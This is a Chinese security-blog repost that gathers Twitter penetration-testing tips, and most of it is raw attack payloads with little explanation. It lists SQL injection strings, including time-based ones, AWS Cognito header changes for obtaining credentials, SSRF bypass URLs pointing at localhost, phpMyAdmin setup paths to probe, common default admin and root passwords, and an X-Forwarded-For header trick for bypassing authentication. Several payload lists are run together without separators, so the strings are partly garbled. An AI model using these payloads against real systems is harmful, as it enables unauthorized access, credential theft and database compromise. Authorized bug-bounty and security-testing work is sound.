干货 | Twitter渗透技巧搬运工(一)
2022-9-7 00:1:59 Author: 橘猫学安全(查看原文) 阅读量:48 收藏

快速检测有无SQL注入

' OR 1=1--' OR 1=0--%27%20or%201=1*(|(object=*)))%20or%20('x'='x%20or%201=11) or pg_sleep(__TIME__)--/**/or/**/1/**/=1' or username like '%);waitfor delay '0:0:__TIME__'--or isNULL(1/0) /*x' or 1=1 or 'x'='y
来源:https://twitter.com/_bughunter/status/1521830121270910977?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

AWS Cognito 配置错误

X-AMZ-TargetAWSCognitoIdentityProviderService.ConfirmSignUpX-AMZ-TargetAWSCognitoIdentityProviderService.GetUser获取凭证访问密钥 ID 和密钥 将标头更改为这样并观察响应X-AMZ-TARGETAWSCognitoIdentityService.GetCredentialsForIdentity

来源:

https://threadreaderapp.com/thread/1522086964262051841.html

SSRF Bypass技巧

SSRF Bypasses
http://0.0.0.0http://0http://0x7f000001http://2130706433http://0000::1http://0000::1:25http://0000::1:22http://0000::1:3128http://2130706433http://3232235521http://3232235777http://2852039166http://0o177.0.0.1

来源:https://twitter.com/_bughunter/status/1521833353015709698?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

PHPMyadmin渗透技巧

当默认凭据在#phpmyadmin登录时不起作用时,我会尝试访问这些路径
admin/phpMyAdmin/setup/index.phpphpMyAdmin/main.phpphpmyadmin/pma/Admin/setup/index.phpphpmyadmin/admin/setup/index.phpphpmyadmin/setup/phpmyadmin/setup/index.php

来源:https://twitter.com/tamimhasan404/status/1522814723271512065?s=20&t=lpTy2cTCgvIjmJ9JyE7-8Q

找到管理员登录口,可以尝试以下账号密码

admin:adminadmin:aadmin:12346578test:testguest:guestanonymous:anonymousadmin:passwordadmin:root:toorroot:passw0rdroot:rootguest:test$sub_name:passwordADMIN:ADMINAdmin:Admin:a:a

来源:https://twitter.com/_bughunter/status/1521374403761745920?s=20&t=aInLegLknUcam2qSjbt2PA

漏洞挖掘小技巧-身份绕过小技巧,修改XFF头

Authentication bypass.... 
Using custom header (See attached screenshot):
X-Forwarded-For: 127.0.0.1

来源:https://twitter.com/BountyOverflow/status/1523264249442627590?s=20&t=aInLegLknUcam2qSjbt2PA

由HACK学习编辑整理,如需转载请注明来源HACK学习
如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell

「 超详细 | 分享 」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具|无状态子域名爆破工具(1秒扫160万个子域)

查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247498198&idx=1&sn=d4cfdfe288c32387412c39543123c5b4&chksm=c04d7ee8f73af7fece076e15b94a63a7f91e5a422af779595178ff05eef23ab33899d91b985f#rd
如有侵权请联系:admin#unsafe.sh